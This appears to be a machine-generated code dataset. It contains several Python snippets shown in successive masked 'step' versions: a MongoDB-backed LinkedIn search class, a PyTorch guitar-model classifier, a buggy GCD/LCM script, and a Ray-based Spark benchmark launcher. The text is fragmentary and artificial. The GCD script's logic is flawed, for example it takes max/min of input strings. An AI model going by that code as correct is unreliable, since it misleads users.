LinkedinSearch()\n print(obj.db_check('mark'))\n",
"step-4": "from pymongo import MongoClient\nfrom modules.linkedinSearch import SearchClass\nfrom config import Config\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n results = self.db_fetch(query)\n return {'data': results}\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\nif __name__ == '__main__':\n obj = LinkedinSearch()\n print(obj.db_check('mark'))\n",
"step-5": "from pymongo import MongoClient\nfrom modules.linkedinSearch import SearchClass\nfrom config import Config\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n # print(i)\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n # self.loop.close()\n\n results = self.db_fetch(query)\n #\n # # return {'results': m}\n return {'data': results}\n\n # ---------------------fetching total number of query pages from database----------------------------------------\n def db_fetch(self, query):\n self.collection.create_index([(\"name\", \"text\")])\n\n lst = []\n cursor = self.collection.find(\n {\"$text\": {\"$search\": query}},\n {'score': {'$meta': \"textScore\"}}).sort([('score', {'$meta': \"textScore\"})])\n total = cursor.count()\n n = 0\n for i in cursor:\n # print(i)\n i.pop('_id')\n lst.append(i)\n n += 1\n\n print('fetched pages from db', len(lst))\n # return {'results': lst,\n # 'total': n}\n return lst\n\n\nif __name__ == '__main__':\n obj = LinkedinSearch()\n print(obj.db_check(\"mark\"))\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import torch
from torchvision import datasets, transforms
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from PIL import Image
import requests
from io import BytesIO
from net import Net
class predict_guitar():
def __init__(self):
"""Model is loaded on init of the class"""
self.model = Net()
if torch.cuda.is_available():
map_location=torch.device('cuda')
else:
map_location=torch.device('cpu')
# load parameters
self.model.load_state_dict(torch.load('model.pt',
map_location=map_location))
if torch.cuda.is_available():
self.model.cuda()
else:
self.model.cpu()
self.model.eval()
def softmax(self, vector):
"""Softmax function for calculating probs"""
e = np.exp(vector)
return e / e.sum()
def predict(self,url):
"""Generating prediction of image url"""
# get image
response = requests.get(url)
img = Image.open(BytesIO(response.content))
transform = transforms.Compose([transforms.Grayscale(),
transforms.Resize((128,128)),
transforms.ToTensor()])
img = transform(img).unsqueeze(0)
if torch.cuda.is_available():
img = img.cuda()
out = self.model(img)
classes = ['Jazzmaster','Les Paul', 'Mustang', 'PRS SE', 'SG',
'Stratocaster','Telecaster']
if torch.cuda.is_available():
logs = out.cpu().data.numpy()
else:
logs = out.data.numpy()
return [classes[logs.argmax()]]
|
normal
|
{
"blob_id": "8743be809953f59bd14431e509042c4c51d9fab4",
"index": 4175,
"step-1": "<mask token>\n\n\nclass predict_guitar:\n <mask token>\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass predict_guitar:\n <mask token>\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self, url):\n \"\"\"Generating prediction of image url\"\"\"\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n transform = transforms.Compose([transforms.Grayscale(), transforms.\n Resize((128, 128)), transforms.ToTensor()])\n img = transform(img).unsqueeze(0)\n if torch.cuda.is_available():\n img = img.cuda()\n out = self.model(img)\n classes = ['Jazzmaster', 'Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster', 'Telecaster']\n if torch.cuda.is_available():\n logs = out.cpu().data.numpy()\n else:\n logs = out.data.numpy()\n return [classes[logs.argmax()]]\n",
"step-3": "<mask token>\n\n\nclass predict_guitar:\n\n def __init__(self):\n \"\"\"Model is loaded on init of the class\"\"\"\n self.model = Net()\n if torch.cuda.is_available():\n map_location = torch.device('cuda')\n else:\n map_location = torch.device('cpu')\n self.model.load_state_dict(torch.load('model.pt', map_location=\n map_location))\n if torch.cuda.is_available():\n self.model.cuda()\n else:\n self.model.cpu()\n self.model.eval()\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self, url):\n \"\"\"Generating prediction of image url\"\"\"\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n transform = transforms.Compose([transforms.Grayscale(), transforms.\n Resize((128, 128)), transforms.ToTensor()])\n img = transform(img).unsqueeze(0)\n if torch.cuda.is_available():\n img = img.cuda()\n out = self.model(img)\n classes = ['Jazzmaster', 'Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster', 'Telecaster']\n if torch.cuda.is_available():\n logs = out.cpu().data.numpy()\n else:\n logs = out.data.numpy()\n return [classes[logs.argmax()]]\n",
"step-4": "import torch\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nfrom net import Net\n\n\nclass predict_guitar:\n\n def __init__(self):\n \"\"\"Model is loaded on init of the class\"\"\"\n self.model = Net()\n if torch.cuda.is_available():\n map_location = torch.device('cuda')\n else:\n map_location = torch.device('cpu')\n self.model.load_state_dict(torch.load('model.pt', map_location=\n map_location))\n if torch.cuda.is_available():\n self.model.cuda()\n else:\n self.model.cpu()\n self.model.eval()\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self, url):\n \"\"\"Generating prediction of image url\"\"\"\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n transform = transforms.Compose([transforms.Grayscale(), transforms.\n Resize((128, 128)), transforms.ToTensor()])\n img = transform(img).unsqueeze(0)\n if torch.cuda.is_available():\n img = img.cuda()\n out = self.model(img)\n classes = ['Jazzmaster', 'Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster', 'Telecaster']\n if torch.cuda.is_available():\n logs = out.cpu().data.numpy()\n else:\n logs = out.data.numpy()\n return [classes[logs.argmax()]]\n",
"step-5": "import torch\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nfrom net import Net\n\nclass predict_guitar():\n\n def __init__(self):\n \"\"\"Model is loaded on init of the class\"\"\"\n \n self.model = Net()\n\n if torch.cuda.is_available():\n map_location=torch.device('cuda')\n else:\n map_location=torch.device('cpu')\n\n # load parameters\n self.model.load_state_dict(torch.load('model.pt',\n map_location=map_location)) \n \n if torch.cuda.is_available():\n self.model.cuda()\n else:\n self.model.cpu()\n \n self.model.eval()\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self,url):\n \"\"\"Generating prediction of image url\"\"\"\n\n # get image\n response = requests.get(url)\n \n img = Image.open(BytesIO(response.content))\n\n transform = transforms.Compose([transforms.Grayscale(),\n transforms.Resize((128,128)),\n transforms.ToTensor()])\n\n img = transform(img).unsqueeze(0)\n\n if torch.cuda.is_available(): \n img = img.cuda() \n\n out = self.model(img)\n\n classes = ['Jazzmaster','Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster','Telecaster']\n\n if torch.cuda.is_available():\n\n logs = out.cpu().data.numpy()\n \n else:\n\n logs = out.data.numpy()\n \n return [classes[logs.argmax()]]\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
<|reserved_special_token_0|>
if factor > 1:
multiple = Decimal(a) * Decimal(b) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
there = input()
store = there.split()
a = int(max(store))
b = int(min(store))
factor = gcd_naive(a, b)
if factor > 1:
multiple = Decimal(a) * Decimal(b) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
<|reserved_special_token_1|>
from decimal import Decimal
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
there = input()
store = there.split()
a = int(max(store))
b = int(min(store))
factor = gcd_naive(a, b)
if factor > 1:
multiple = Decimal(a) * Decimal(b) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
<|reserved_special_token_1|>
# Uses python3
from decimal import Decimal
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
there = input()
store = there.split()
a = int(max(store))
b = int(min(store))
factor = gcd_naive(a,b)
if factor > 1:
multiple = (Decimal(a) * Decimal(b)) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
|
flexible
|
{
"blob_id": "c70681f5ff8d49a243b7d26164aa5430739354f4",
"index": 6936,
"step-1": "<mask token>\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\n<mask token>\nif factor > 1:\n multiple = Decimal(a) * Decimal(b) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\nprint(int(multiple))\n",
"step-3": "<mask token>\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\nthere = input()\nstore = there.split()\na = int(max(store))\nb = int(min(store))\nfactor = gcd_naive(a, b)\nif factor > 1:\n multiple = Decimal(a) * Decimal(b) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\nprint(int(multiple))\n",
"step-4": "from decimal import Decimal\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\nthere = input()\nstore = there.split()\na = int(max(store))\nb = int(min(store))\nfactor = gcd_naive(a, b)\nif factor > 1:\n multiple = Decimal(a) * Decimal(b) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\nprint(int(multiple))\n",
"step-5": "# Uses python3\nfrom decimal import Decimal\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\nthere = input()\nstore = there.split()\na = int(max(store))\nb = int(min(store))\nfactor = gcd_naive(a,b)\nif factor > 1:\n multiple = (Decimal(a) * Decimal(b)) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\n\nprint(int(multiple))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path += [perfd_dir, microps_dir]
<|reserved_special_token_0|>
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path_join = os.path.join
real_path = os.path.realpath
perfd_dir = real_path(path_join(os.getcwd()))
microps_dir = path_join(perfd_dir, 'thirdparty', 'microps')
sys.path += [perfd_dir, microps_dir]
<|reserved_special_token_0|>
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
import ray
import os
import sys
import random
path_join = os.path.join
real_path = os.path.realpath
perfd_dir = real_path(path_join(os.getcwd()))
microps_dir = path_join(perfd_dir, 'thirdparty', 'microps')
sys.path += [perfd_dir, microps_dir]
from thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker
from thirdparty.microps.build.spark.driver import add_role as add_spk_role
import thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk
import thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
import ray
import os
import sys
import random
path_join = os.path.join
real_path = os.path.realpath
perfd_dir = real_path(path_join(os.getcwd()))
microps_dir = path_join(perfd_dir, "thirdparty", "microps")
sys.path += [perfd_dir, microps_dir]
from thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker
from thirdparty.microps.build.spark.driver import add_role as add_spk_role
import thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk
import thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils
@ray.remote
def run(run_config: dict, wrks: dict) -> dict:
try:
add_spk_role()
except:
print("run, spark: ignore")
os.chdir(microps_dir)
# TODO: add virtual cluster labels to the pods
base_spk_config = spk.apps_config_map["sparkperfml"]
# TODO: update driver and executor memory
base_spk_config = spk.patched_app_config(base_spk_config,
{
"app_name": run_config["appName"],
"ins_type": run_config["serverInstanceType"],
"ins_num": run_config["numExecutor"] + 1,
# "node_selectors": cur_node_selectors,
"driver_adaptive_gc": run_config["driverAdaptiveGC"],
})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b["name"] == run_config["appName"]:
bench = b
if bench is None:
print("run, spark: unable to find bench", run_config["appName"])
# spark sql perf configurations
config_base = SparkBenchMaker.load_base()
# change the dataset scale
utils.update_bench_params(base=config_base, bench=bench,
key="numExamples", value=run_config["inputScale"], is_scale=True)
# change number of partition, each executor has at least one partition
utils.update_bench_params(base=config_base, bench=bench,
key="numPartitions", value=run_config["numPartition"], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench,
key="randomSeed",
value=random.randint(0, 10000) if run_config.get("randomSeed", 1) == "random" else 1,
is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base,
{
"benchmarks": [bench]
})
print(bc)
exp = SparkExperiment(
{
"app_configs": base_spk_config,
"exp_configs": {
"s3_log_bucket": run_config["logBucket"],
"num_executor": run_config["numExecutor"],
"ins_type": run_config["serverInstanceType"],
"ins_num": run_config["numServerInstance"],
"run_interval": 0.5,
"runs": 1,
"bench_config": bc,
},
"ins_type_num": [(run_config["serverInstanceType"], run_config["numServerInstance"])],
"variables": {},
}
)
exp.run()
return {}
|
flexible
|
{
"blob_id": "25595b5f86a41fee1dc43f199f3bcff73f6d256b",
"index": 9418,
"step-1": "<mask token>\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-2": "<mask token>\nsys.path += [perfd_dir, microps_dir]\n<mask token>\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-3": "<mask token>\npath_join = os.path.join\nreal_path = os.path.realpath\nperfd_dir = real_path(path_join(os.getcwd()))\nmicrops_dir = path_join(perfd_dir, 'thirdparty', 'microps')\nsys.path += [perfd_dir, microps_dir]\n<mask token>\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-4": "import ray\nimport os\nimport sys\nimport random\npath_join = os.path.join\nreal_path = os.path.realpath\nperfd_dir = real_path(path_join(os.getcwd()))\nmicrops_dir = path_join(perfd_dir, 'thirdparty', 'microps')\nsys.path += [perfd_dir, microps_dir]\nfrom thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker\nfrom thirdparty.microps.build.spark.driver import add_role as add_spk_role\nimport thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk\nimport thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-5": "import ray\nimport os\nimport sys\nimport random\n\npath_join = os.path.join\nreal_path = os.path.realpath\n\nperfd_dir = real_path(path_join(os.getcwd()))\nmicrops_dir = path_join(perfd_dir, \"thirdparty\", \"microps\")\nsys.path += [perfd_dir, microps_dir]\n\nfrom thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker\nfrom thirdparty.microps.build.spark.driver import add_role as add_spk_role\nimport thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk\nimport thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) -> dict:\n try:\n add_spk_role()\n except:\n print(\"run, spark: ignore\")\n os.chdir(microps_dir)\n\n # TODO: add virtual cluster labels to the pods\n base_spk_config = spk.apps_config_map[\"sparkperfml\"]\n\n # TODO: update driver and executor memory\n base_spk_config = spk.patched_app_config(base_spk_config,\n {\n \"app_name\": run_config[\"appName\"],\n \"ins_type\": run_config[\"serverInstanceType\"],\n \"ins_num\": run_config[\"numExecutor\"] + 1,\n # \"node_selectors\": cur_node_selectors,\n \"driver_adaptive_gc\": run_config[\"driverAdaptiveGC\"],\n })\n\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b[\"name\"] == run_config[\"appName\"]:\n bench = b\n if bench is None:\n 